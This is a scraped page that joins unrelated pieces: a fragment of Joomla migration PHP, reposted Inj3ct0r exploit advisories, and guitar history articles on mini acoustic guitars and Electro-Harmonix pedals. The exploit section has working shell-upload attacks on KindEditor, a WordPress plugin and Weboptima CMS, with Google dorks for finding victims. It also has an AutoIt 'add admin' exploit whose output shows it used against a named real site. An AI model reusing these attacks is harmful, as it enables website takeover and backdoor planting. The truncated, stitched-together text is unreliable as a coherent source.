            $sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES ($parent, '$folder->name', $folder->published, '$folder->description', '$folder->files', '$folder->icon', $folder->registered)";
            if (!$database->query()) {
                echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
            $newid = $database->insertid();
            $containermap['folderid'][$folder->id] = $newid;
            $sql = "SELECT * FROM #__downloads_folders WHERE parentid=$folder->id";
            $children = $database->loadObjectList();
            if ($children) {
                foreach ($children as $child) convertfolder ($child, $newid, $containermap);


    I'll let you work that one out for yourself!! ^_^ heheheee….

    << For the dork [inurl:"/func,addfile/"]

    Example:


    The injection method isn't much different; just append /id/(number). For example…


              KindEditor (Upload File)   

    I'm KedAns-Dz member from Inj3ct0r Team

    # Title : KindEditor (v.3.x->4.1.5) <= File/Shell Upload Vulnerability
    # Author : KedAns-Dz
    # E-mail : ked-h (@hotmail.com / @1337day.com)
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
    # Web Site : www.1337day.com
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d
    # TwiTter : @kedans
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
    # Platform/CatID : php - remote - Multiple
    # Type : php - proof of concept - webapp 0day
    # Tested on : Windows7
    # Download : [http://code.google.com/p/kindeditor/downloads/detail?name=kindeditor-4.1.5.zip]
    # Vendor : [http://www.kindsoft.net/]

    # <3 <3 Greetings t0 Palestine <3 <3
    # F-ck HaCking, Lov3 Explo8ting !

    ######## [ Proof / Exploit ] ################|=>

    # Description :
    - This bug in ( KindEditor ) lets you upload remote files ( .txt .html ...etc )
    with multiple JSON upload langs ( PHP / ASP / JSP / ASP.NET ).
    This bug was found in old versions by another author, but it still works in the latest version.

    - Latest V. is ( 4.1.5 ) , Released on ( Jan 19, 2013 )

    - old poc : (http://www.devilscafe.in/2012/01/kindedior-remote-file-upload-exploit.html)

    # Google Dork :
     allinurl:/php/upload_json.php / .asp / .jsp

    # KindEditor PHP_JSON Uploader


    $ch = curl_init("http://[Target]/[path]/kindeditor/php/upload_json.php?dir=file");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('imgFile' => '@evil.txt')); // field name per the uploader below; payload filename is illustrative
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";


    # KindEditor (ASP,ASP.NET,JSP,PHP) _JSON Uploader :

    - Change the Uploader by ( LANG / PATH ) and use this HTML Uploader


    <title>Uploader By KedAns-Dz</title>
    <script src="http://[Target]/kindeditor/kindeditor-min.js"></script>
    <script>
    KindEditor.ready(function(K) {
        var uploadbutton = K.uploadbutton({
            button : K('#uploadButton')[0],
            fieldName : 'imgFile',
            url : 'http://[Target]/kindeditor/php/upload_json.asp?dir=file',
            afterUpload : function(data) {
                if (data.error === 0) {
                    var url = K.formatUrl(data.url, 'absolute');
                    K('#url').val(url);
                }
            }
        });
        uploadbutton.fileBox.change(function(e) {
            uploadbutton.submit();
        });
    });
    </script>
    <div class="upload">
    <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
    <input type="button" id="uploadButton" value="Upload" />
    </div>

              Wordpress Plugin Sexy Add Template   

     I'm NuxbieCyber Member From Inj3ct0r TEAM

     |||   Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability    |||

     ./Title Exploit : Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability
     ./Link Download : http://wordpress.org/extend/plugins/sexy-add-template/
     ./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ]
     ./Security Risk : [ Critical Level ]
     ./Category XPL  : [ WebApps/ZeroDay ]
     ./Tested On     : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
     ./Time & Date   : September, 22 2012. 10:27 AM. Jakarta, Indonesia.

     |||                        -=[ Use It At Your Risk ]=-                        |||
     |||               This Was Written For Educational Purposes Only              |||
     |||               Author Will Be Not Responsible For Any Damage               |||

     # [ Information Details ]
     # - Wordpress Plugin Sexy Add Template:
     # Attacker allow CSRF Upload Shell.
     # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce".
     # <html>
     # <head>
     # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
     # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
     # </head>
     # <body onload="document.form0.submit();">
     # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" enctype="multipart/form-data" >
     # <input type="hidden" name="newfile" value="yes" />
     # <input type="hidden" name="AM_filename" value="shell.php">
     # <textarea type="hidden" name="AM_file_content">
     # [ Your Script Backdoor/Shell ]
     # </textarea>
     # </form>
     # </body>
     # </html>
     # - Access Shell:
     # http://localhost/wp-content/themes/[theme-name]/shell.php
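     The attack above works only because the AM-sexy-handle page never verifies a nonce. For contrast, here is a minimal sketch of the standard WordPress defence; the action name am_sexy_save is invented, while the handler page and field names follow the PoC above:

     ```php
     <?php
     // Sketch only -- not the plugin's code. WordPress's nonce API ties the
     // form to the logged-in user's session, so a cross-site form can't forge it.

     // When rendering the admin form:
     wp_nonce_field('am_sexy_save');

     // At the top of the themes.php?page=AM-sexy-handle handler:
     if (!current_user_can('edit_themes') || !check_admin_referer('am_sexy_save')) {
         wp_die('Request verification failed.');
     }
     // Only after these checks should $_POST['AM_filename'] and
     // $_POST['AM_file_content'] be touched.
     ```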

              Joomla (webotima shell upload vuln)   

    I'm AkaStep member from Inj3ct0r Team

    Video: http://www.youtube.com/watch?v=2Cm9hNR3dNc&feature=youtu.be
    Vulnerable Software: Weboptima CMS
    Vendor: http://weboptima.am/
    Both exploits are available: an HTML exploit to upload a shell,
    and an AutoIt exploit to add arbitrary admin accounts to the target site.
    More details below.

    Few DEMOS:

    About Vulns:

    1'ST vulnerability is REMOTE SHELL UPLOAD:
    Vulnerable code:

    =============SNIP BEGINS======================
    mkdir($path, 0777);

    $letter = $_GET['letter'];
    $selTypey = $_GET['selType'];
    header("Location: upload.php?letter=$letter&selType=$selTypey");
    <?php include_once("start.php"); ?>
        <div align="center">
        <table align="center">
            <td colspan="3" align="center"><span class="title">ФїЦЃХѕХЎХ® Ц†ХЎХµХ¬ХҐЦЂ</span></td>
    $fileName = $_FILES["up_file"]['name'];
    $masSimbl = array('&','%','#');
    if(in_array($fileName[0], $masSimbl))
    echo $fileName[0].' ХЅХ«ХґХѕХёХ¬ХёХѕ ХЅХЇХЅХѕХёХІ ХЎХ¶ХёЦ‚Х¶ Х№ХЁХ¶ХїЦЂХҐХ¬';
    ========================SNIP ENDS=================

    Simple HTML exploit to upload your shell:

    <form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">
    <input type="file"   name="up_file" />&nbsp;&nbsp;<input type="submit" class="button" name="sub" value="send"></form>

    After Successfully shell upload your shell can be found: http://site.tld/uploades/shellname.php

    NOTE: There may be a simple .htaccess rule preventing you from accessing the shell (HTTP 403).
    This is not a problem; just upload your shell like:



    2'nd vulnerability is: REMOTE ADD ADMIN
    Vulnerable Code:
    Notice: header() without exit; *the script continues its execution.*
    ==================SNIP BEGINS=========
    if($_SESSION['status_shoping_adm']!="adm_shop") {
    header("Location: index.php");

    $_POST = stripSlash($_POST);
    $_GET = stripSlash($_GET);
    $error = "";
    //And more stuff
    ==================SNIP ENDS=============

    And here is exploit written in Autoit to exploit
    this vulnerability and add admin to target site.

    Exploit usage(CLI):

    weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere

    Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)
    Usage: weboptima.exe http://site.tld  username  password
    [*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]
    [@@@]           Vuln & Exploit By AkaStep               [@@@]
    [*] GOT Response : Yes! It is exactly that we are looking for! [*]

    Trying to add new admin:
    To Site:www.decart.am
    With Username: AzerbaijanBlackHatzWasHere
    With Password: AzerbaijanBlackHatzWasHere

    Exploit Try Count:1
    Error Count:0

    Exploit Try Count:2
    Error Count:0
    Count of errors during exploitation : 0

    [*] Yaaaaa We are Going To Travel xD           [*]
    Try to login @
    Site: decart.am/cms/index.php
    With Username: AzerbaijanBlackHatzWasHere
    With Password: AzerbaijanBlackHatzWasHere
    *NOTE* Make Sure Your Browser Reveals HTTP REFERER!
    [*] Exit [*]

    #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
    #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
    #include "WinHttp.au3"
    #include <inet.au3>
    #include <String.au3>

    $exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
    'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF  & _
    'Usage: ' & @ScriptName &  ' http://site.tld ' & ' username  ' & 'password ' & _
    @CRLF & "[*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]" & @CRLF & _
    '[@@@]           Vuln & Exploit By AkaStep               [@@@]' & @CRLF & _StringRepeat('#',62);
    ConsoleWrite(@CRLF & $exploitname & @CRLF)

    $vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);
    Global $count=0,$error=0;
    $cmsindent='kcaptcha'; # We will use it to identify CMS #;

    ;#~  Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;
    $useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
    $msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName &  ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF
    if  $CmdLine[0] <> 3 Then
    ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);

    if $CmdLine[0]=3 Then

    if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
    ConsoleWrite('Are you kidding me?');

    if @error Then
    ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)

    ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);

    $sidentify=_INetGetSource($targetsite & $adminpanel,True);

    if StringInStr($sidentify,$cmsindent) Then
    ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
    ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)

    $targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')

    priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#

    Func priv8($targetsite,$username,$password,$count,$error)

    $count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;

    Global $sAddress = $targetsite

    $triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
    $whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF &  'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
    $username & @CRLF & 'With Password: ' & $password &  $triptrop;
    if $count <=1 then ConsoleWrite($whatcurrentlywedo)

    $doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;
    Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";

    if $error>=2 OR $count>=2 Then
    ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)

    if int($error)=0 then
    ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD           [*]' & _
    @CRLF & 'Try to login @ '  & @CRLF  & _
    'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: '  & _
    $username & @CRLF & 'With Password: ' & $password & @CRLF & _
    '*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _
    '   OTHERWISE YOU WILL UNABLE TO LOGIN!   ' & $triptrop & '[*] Exit [*]' & $triptrop);

    ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed?   [*]' & @CRLF & _
    '[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
    '[*]  May be you are Lucky;)                   [*]' & _
    @CRLF & 'Try to login @ '  & @CRLF  & _
    'Site: ' & $targetsite & $adminpanel & @CRLF & _
    'With Username: '  & $username & @CRLF & 'With Password: ' & $password &  $triptrop & '[*] Exit [*]' & $triptrop);



    Global $hOpen = _WinHttpOpen($useragent);
    Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
    Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
    _WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
    _WinHttpAddRequestHeaders($hRequest, "DNT: 1")
    _WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;
    _WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;
    _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
    _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
    _WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
    _WinHttpSendRequest($hRequest, -1, $sPostData)

    Global $sHeader, $sReturned
    If _WinHttpQueryDataAvailable($hRequest) Then
        $sHeader = _WinHttpQueryHeaders($hRequest)
            $sReturned &= _WinHttpReadData($hRequest)
        Until @error


    priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;



    priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#


    EndFunc;=> priv8();


              Uploader Arbitrary File Upload Vulnerability   

                 I'm Sammy FORGIT member from Inj3ct0r Team
    # Description : Wordpress Plugins - Uploader Arbitrary File Upload Vulnerability
    # Version : 1.0.4
    # Link : http://wordpress.org/extend/plugins/uploader/
    # Plugins : http://downloads.wordpress.org/plugin/uploader.1.0.4.zip
    # Date : 28-12-2012
    # Google Dork : inurl:/wp-content/plugins/uploader/
    # Site : 1337day.com Inj3ct0r Exploit Database
    # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr

    Exploit :


    $ch = curl_init("http://localhost/wordpress/wp-content/plugins/uploader/uploadify/uploadify.php");
    curl_setopt($ch, CURLOPT_POST, true);  
    curl_setopt($ch, CURLOPT_POSTFIELDS,
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    print "$postResult";


    Shell Access :


    # Site : 1337day.com Inj3ct0r Exploit Database

              Mini Acoustic Guitars   
    Ever since the origins of the modern guitar in the 18th century, the instrument has been available in various sizes. Antonio de Torres gave the modern classical guitar the form we know today. The modern classical guitar has a scale of 648 to 650 mm, which is roughly 25.6 inches. Full size electric guitars have a slightly shorter scale: most Fender instruments are 25 1/2”, while Gibson has maintained a 24 3/4” scale.
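    The metric-to-imperial figures above are easy to sanity-check; here is a throwaway conversion sketch (nothing guitar-specific is assumed, just the definition of 25.4 mm to the inch):

    ```python
    # Sanity-check the quoted scale lengths: 1 inch is defined as 25.4 mm.
    MM_PER_INCH = 25.4

    def mm_to_inches(mm: float) -> float:
        """Convert a length in millimetres to inches."""
        return mm / MM_PER_INCH

    # The 648-650 mm classical scale works out to about 25.5-25.6 inches.
    for mm in (648, 650):
        print(f"{mm} mm = {mm_to_inches(mm):.1f} in")
    ```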

    Sizes of Classical Guitars

    Classic guitar builders have offered guitars that are 1/4 sized, 1/2 sized, 3/4 sized, and full size for players of different ages and differing physiques.

    1830 Stauffer Terz

    In the 1830s C.F. Martin introduced the Terz guitar. It was based on the size of the Terz, or treble, classical guitar. Joseph Stauffer, from whom C.F. Martin senior learned his craft, had built Terz guitars, so it stands to reason Martin would continue the tradition.

    Martin 5-18 Terz Guitar

    The Martin Terz was a 3/4 scale guitar offered in different styles. The 5-18 was probably the most popular; Marty Robbins used his on stage. This guitar was designed to be tuned three frets above standard pitch.

    1937 Gibson L-00

    In 1932 Gibson introduced the L-00 flat top guitar. This was a small bodied instrument, and one of the nicer versions of the L series. By 1937, Gibson offered this model in a 3/4 sized option.

    1950 Gibson LG-2 3/4 size

    In 1933 Gibson had also introduced the very fancy LC model in a 3/4 sized version. In 1942 Gibson offered the LG-2, and by 1949 it was available in a 3/4 size version. This is the guitar that Arlo Guthrie favors.

    Arlo Guthrie LG-2 

    In 2002 Gibson decided to reintroduce this very model when Arlo Guthrie contacted Gibson’s craftsmen to ask for help in reconstructing a guitar that his father Woody had given him as a present. After painstakingly rebuilding the instrument, Gibson decided to offer the same guitar to the public as the Arlo Guthrie LG-2 3/4. The list price was $2,079, but they are available for much less.

    Back in 1945, following World War II, Harmony guitars of Chicago was back in business and reintroduced the Stella guitar. Stella had been a brand offered as far back as 1899 by the Oscar Schmidt Company. When that company went bankrupt in the 1930’s, Harmony stepped in and acquired its assets.

    Harmony "Stella"  H929

    The 3/4 sized Stella H929 was in the lineup from 1945 through 1970 and was popular as a student model. The guitar was made mainly from birch, using all solid woods, and was ladder braced. Despite being 3/4 sized, it still had a 24 1/2” scale.

    Bob Taylor working on a guitar
    Bob Taylor was working for a small guitar manufacturing business in 1972 when he was only 18 years old. Within two years, Bob and co-workers Kurt Listug and Steve Schemmer bought the company. They needed a brand name to put on the guitars.

    Schemmer Guitars and Listug Guitars did not sound as marketable as Taylor Guitars, so Taylor Guitars it was. None of the men had studied Martin’s guitar making techniques, so their ideas were fresh and took a new approach. By 1983 Taylor and Listug had bought out Schemmer’s stake in the company.

    1996 Baby Taylor (Baby on head stock)

    Back in 1996, at a time when most of us were interested only in dreadnought sized guitars, the Baby Taylor made its debut and started a new trend in guitar manufacturing.

    Baby Taylor neck
    Taylor Guitars had already come up with an interesting concept in its bolt-on neck, which utilized precision cut spacers and bolts to attach the neck to the guitar’s body, making neck adjustments quick and painless. This same process was applied to the Baby Taylor.

    The instrument’s heelless neck attaches to the guitar’s body by means of two screws that are flush with the fretboard and located between the 15th and 16th frets.

    Baby Taylor arched back
    The guitar’s back and sides are made of 3 layers of laminated sapele wood, and the back is slightly arched. Other guitar companies, such as Guild, Framus, and Gibson, have used this same method of arching the back through heated pressing for strength, so the back requires no internal bracing.

    The guitar’s top is made of solid Sitka spruce. Black matte veneer covers the headstock, which bears the decal with the Taylor logo.

    The guitar comes with its own gig bag.

    Taylor Swift Baby Taylor

    The Baby Taylor has a 22 3/4” scale on its diminutive 15 3/4” by 12 1/2” body. The guitar was an instant hit, and notice was taken by many other guitar manufacturers. In its first year the Baby Taylor sold over 1,000 units, and sales of the tiny guitar increased from there.

    Martin guitars offered the Backpacker around 1993. Chris Martin IV had visited luthier Robert McNally’s booth at the 1993 NAMM convention, where the luthier was displaying his 3 string Strumstick.

    Bob McNally with a Strumstick
    The original instrument was based on the mountain lap dulcimer but was meant to be played like a guitar. A deal was struck at the show for 5,000 units. The neck was changed to a six string guitar design, and the instrument was dubbed the Backpacker.

    1995 Martin Backpacker

    Although the guitar did not have the greatest tone or volume, its compact size and durability made it successful. The Backpacker was even taken into outer space by one of the astronauts.

    Martin 5-15 & Backpacker

    The design changed in 2002, when the instrument’s body was enlarged to enhance the tone and make the instrument easier to hold. Martin has also offered this same instrument with nylon strings, as well as in mandolin and ukulele versions.

    Martin LXM
    In 2003 Martin took the concept of a small guitar a step further with the introduction of the Martin LXM. The LXM, or Little Martin, is designed as a modified 0-14 fret tenor Martin shape. The scale is 23” in length. The entire guitar is constructed of high-pressure laminate, or HPL, which is essentially the same process used for making Formica. The neck on the Little Martin is made of rust birch laminate. The fretboard is constructed of black Micarta, while the nut is made of white Corian. The saddle is made of white Tusq. The tuners are made by Gotoh.

    Martin LXME

    The original version was only offered as an acoustic instrument. Later on the LXME came with Fishman transducers and Mini Q electronics. The LXM models all come with a gig bag.

    Martin LX1

    The Martin LX1 is the same style of guitar, but it has a solid Sitka spruce top.

    LX1E Ed Sheeran model

    Ed Sheeran began his busking career using a Little Martin and Martin guitars offers the Ed Sheeran X signature series LX size guitar with built-in Fishman Isys T electronics.

    Martin LX1e

    Martin also makes the LX1e electric acoustic models, which feature a solid spruce top.

    2013 Taylor GS Mini
    In July of 2013 Taylor Guitars introduced the GS Mini guitar. After experimenting with changes to the Baby Taylor, a new design based on Taylor’s Grand Symphony shape was decided on. The GS Mini has a different body shape and different bracing.

    The top is made of solid Sitka spruce and the back and sides are sapele laminate. The body is approximately 2” larger than the Baby Taylor. The scale is 23 1/2”, and the body is an inch deeper than the Baby Taylor. Once again, it features the arched back design.

    Taylor GS Mini E

    The neck on this model, although a bolt-on featuring Taylor’s NT design, does have a heel. The action is low and feels quite good. The original models were only offered as acoustic guitars, but could be equipped with the optional ES-Go acoustic pickup.

    ES-Go Pickup System

    This unit is built exclusively for the GS Mini guitar. The ES-Go is a stacked humbucking magnetic pickup which clips onto a bracket in the sound hole, underneath the fretboard. Once in place, the player swaps out the end pin and replaces it with the one attached to the ES-Go unit. It is made to be paired with Taylor’s “V” cable, which has a volume control. The unit sells for an additional $100.

    Taylor GS Mini Mahogany-Spruce

    Since its inception, Taylor has improved this guitar by offering optional body woods, such as a mahogany top or a spruce top with laminated walnut back and sides. The electronics have also been updated.

    2015 Taylor GS Mini E
    The Taylor GS Mini e is now available with built-in Taylor Expression System 2 electronics, which places 3 pickup sensors behind the guitar’s bridge. Taylor feels this is superior to the under-saddle method that many designers have used. It also comes with a built-in preamp.

    This option adds $100 to the guitar’s price, but eliminates the need for putting on or removing the ES-Go unit.

    Back in 1997, just a year after Bob Taylor introduced the Baby Taylor, Tacoma Guitars of Seattle Washington introduced The Papoose mini guitar.

    The Tacoma Factory - Frets magazine
    Tacoma Guitars was a division of The Tacoma Lumber Company.  In 1991 this company was processing hardwood that was milled into piano soundboards exclusively for the Young Chang Piano Company of South Korea.

    The lumber company's general manager, J.C. Kim, persuaded Young Chang to build a guitar manufacturing plant nearby, and the company started turning out some rather unique instruments. Among these was the tiny P1 Papoose guitar, designed by luthier Terry Atkins and George Gruhn.

    1997 Tacoma Papoose

    The Tacoma P1 Papoose had a short scale neck with only a 19.1” scale, and it was built to be tuned a fourth higher than normal guitar tuning. In other words, the strings were tuned from A to A.

    Paisley Soundhole on Papoose
    This guitar introduced the paisley sound hole, which became a Tacoma trademark, and the Voiced Bracing Support system, which was designed to minimize the bracing down to only what the instrument needs to remain stable.

    Back of 1997 Papoose

    The heelless neck on the Papoose was bolted on and secured by two screws. The bridge was uniquely shaped and had 3 unusual C-shaped cut-outs to secure the strings. Some later models came with bridge pins.

    Papoose 12 String
    The Papoose was available in a variety of soundboard woods. Tacoma also came out with the P112 Papoose 12 string, and towards the end of the line Tacoma introduced an electric version of the Papoose.

    Young Chang put the company up for sale in 1999 and it was sold to Fender Musical Instruments Corporation in 2004.

    Sadly in 2008 Fender closed the plant and laid off the staff. Though the Papoose is no longer produced, it can still be found on auction sites at a fairly reasonable rate.

    Since the Baby Taylor and the Little Martin have proved to be successful, many major guitar manufacturers, too numerous to mention, have developed and offer 3/4 sized mini acoustic guitars in their line up.

    Dean Flight

    Among them Dean Guitars offers the Dean Flight that retails for around $150 USD. It is a laminated guitar with a 22” scale. The neck is mahogany, and the headstock is done in the Dean-wing style. It comes with a gig bag.

    Fender MA-1
    Fender offers the MA-1 Parlor 3/4 size guitar. The top is laminated Agathis and the back and sides are laminated Sapele. As with most of the mini acoustic guitars a gig bag is included.

    Yamaha JR1

    Yamaha’s product is the JR1 Mini Folk.

    Luna Safari

    Luna Guitars offers a similar 3/4 sized guitar called the Muse Safari guitar.

    Takamine GX18CE-NS

    Takamine has the GX18CE-NS, which retails around $400, but it does have a solid spruce top, rosewood fretboard and electronics with a built-in preamp.

    KLOS Mini guitar

    One of the more unique mini guitars comes from a company called Klos. Their instrument has a carbon fiber body. The neck is made of mahogany and topped with a rosewood fretboard.

    KLOS Mini guitar
    Despite being small in size, the scale is 24 3/4”. Plus, the neck is removable. It comes with a gig bag and sells direct from the manufacturer for around $600 USD.

              Electro-Harmonix Effects Pedals; A Brief History   
    Electro-Harmonix original logo
    For electric guitarists it is not enough to have your instrument sound like a guitar; we leave that to the jazz players, the classical players, and the folkies. Electric players want to make their instrument growl, wail, and scream.

    Guitar George

    We are not like “Guitar George, he knows all the chords. Mind he’s strictly rhythm he doesn’t want to make them cry or sing.” The majority of us want to express ourselves and be heard.

    Maestro Fuzztone
    Aside from a loud, overdriven amplifier, effects pedals are necessary tools for most guitarists and bass players. The granddaddy of them all was the Maestro Fuzztone. This was the pedal used on the Rolling Stones’ hit song “Satisfaction,” and it started a whole industry.

    One of the original and most prominent manufacturers of guitar and bass effects pedals is Electro-Harmonix. The company emerged on the scene in New York City back in 1968.

    Mike Matthews in 1979

    Back in 1967 Mike Matthews, the company’s owner and founder, was a rhythm and blues piano player with a daytime sales job. His friend Bill Berko was an audio repairman who had just constructed a circuit for a guitar fuzz pedal.

    '67 Axis and Foxey Lady fuzz pedals

    On Matthews’ advice, Berko hired a company to construct these pedals under a deal with the Guild Guitar Company, and the device was given the name Axis fuzz pedal. It was also sold under the name Foxey Lady.

    All parties made a little money off the deal, and eventually Berko and Matthews parted ways.

    Mike Matthews 1967
    However, Mike Matthews was smitten with the idea of creating guitar effects. As I've mentioned, at the time Matthews was a salesman for IBM, and he next teamed up with an IBM colleague, an electrical engineer by the name of Bob Myer.

    In 1969 they worked together to create a distortion-free sustain device. Some fuzz tones of that era produced a buzz-saw-like effect with some sustain, while others, like the Maestro box, just added gain to distort the guitar’s signal. Guitarists at the time wanted the ability to play and hold notes, just like horn players.

    Original LPB-1
    What Myer and Matthews came up with was a small device, the Linear Power Booster, which they called the LPB-1. This pedal boosted the signal and made the guitar stand out. It did not sit on the floor, but was made to be plugged directly into the amplifier input.

    Vintage LPB-1 interior

    The price for this unit was about $20 USD, and it was an instant hit. The original units were hand wired with no circuit board.

    1969-70 version Big Muff Pi (π)
    The next effect that Matthews and Bob Myer created was a fuzz tone that added low-end-heavy sustain to any guitar sound. They gave it the name The Big Muff Pi. It mixed harmonic distortion, sustain, and fuzz together to make even a small amplifier sound huge, and it distorted at any volume. Both devices were instant hits and were put to use by well known artists.

    '75 Big Muff Pi (π) interior
    The original version of the Big Muff Pi was pretty much hand-made on perforated electronic boards, with the wiring and parts hand-soldered. But by 1970 these devices were updated to etched PCB boards.

    Double Muff and Little Muff
    The Big Muff was such a hit that subsequent versions emerged in later years, such as the Metal Muff, which had a higher gain threshold, and the Double Muff, which was two Big Muffs wired in series, offering overdrive through a single circuit or a cascaded pair.

    The Little Big Muff was a smaller version of the unit with a slight variation in the circuit. The NYC Big Muff came with a tone bypass switch that allowed the user to bypass the tone control, and another switch that adjusted the frequencies of 3 filters embedded in the circuit.

    EH Bass and Treble boost

    There were several other devices made by Electro-Harmonix in the late 1960's and early 1970's, including a treble booster called the Screaming Bird and a bass booster called the Mole, made in a similar format to the LPB-1. These small boxes had an input on one end to accept the guitar cable and a plug on the opposite side that went into the amplifier. These units originally sold for around $20 USD.

    EH Slap Back Echo

    The company also produced the Slap-Back Echo box that produced a slap-back effect and came with a filter switch to shape the tone.

    1975 EH Small Stone Phaser
    One of the more popular effects the company produced at this time was the Small Stone Phase Shifter, a 4 stage phasing circuit designed by David Cockerell. This device had one large knob to adjust the rate of phasing and a slider switch labeled “Color” that engaged an additional stage of feedback for a more pronounced sound. Think of the Doobie Brothers song “Listen to the Music”.

    EH Bad Stone Phase Shifter

    The Bad Stone Phase Shifter was an upgraded circuit that added a Feedback control and a Manual Shift control to filter the sweet spot.

    '77 EH Octave Multiplexer

    Electro-Harmonix came out with an octave box called the Octave Multiplexer, which produced the clean signal along with a filtered signal an octave below.

    EH Electric Mistress Flanger

    The Electric Mistress Flanger Chorus Pedal came out in the mid 1970’s and was one of the first multi-effects devices.

    Mid 70's EH Attack Equalizer

    The Electro-Harmonix Attack Equalizer pedal combined a parametric EQ to produce the desired equalization with a preamplifier to boost the guitar’s signal.

    1981 EH Graphic Fuzz

    The Electro-Harmonix Graphic Fuzz was not only a fuzztone/distortion unit; it also added a six band graphic EQ section.

    1980 EH Full Double Tracking Effect
    The Full Double Tracking Effect split the guitar’s signal. One side was given a slight, adjustable delay, while the other carried the original guitar signal. It came with a switch that set the delay to 50 ms or 100 ms, and a knob that adjusted the mix of the original and delayed signals.

    '77 EH Triggered Y Filter

    The Triggered Y Filter was sort of a phaser unit that allowed the frequency range to be set to Lo or Hi, and the amplitude/depth of the filter sweep to be adjusted.

    Late '70's EH Echoflanger

    The Echo Flanger produced a modulated echo and a flanging effect, similar to what record producers did when they pressed a finger or thumb on the recording tape to cause one of the tracks to be slightly delayed.

    1978 EH Memory Man

    The Electro-Harmonix Memory Man was introduced in 1978 and produced analog delay and echo using “bucket brigade” integrated circuits. It also incorporated a chorus effect, so the user could choose echo or chorus.

    EH Deluxe Memory Man

    Several models of this effect followed, including a stereo version and the Deluxe Memory Man, which added a chorus/vibrato feature to the echo.

    EH Small Clone Chorus

    The Small Clone chorus, introduced by EHX around 1981, remains a very popular chorus pedal. It was also produced in two smaller versions known as the Neo Clone and the Nano Clone.

    EH Holy Grail Reverb

    Electro-Harmonix issued a very popular reverb pedal called the Holy Grail. This pedal came in several different formats, including the Holy Grail Plus and the Cathedral. The Holy Stain was a multi-effects pedal that offered two different types of reverb.

    EH Wiggler

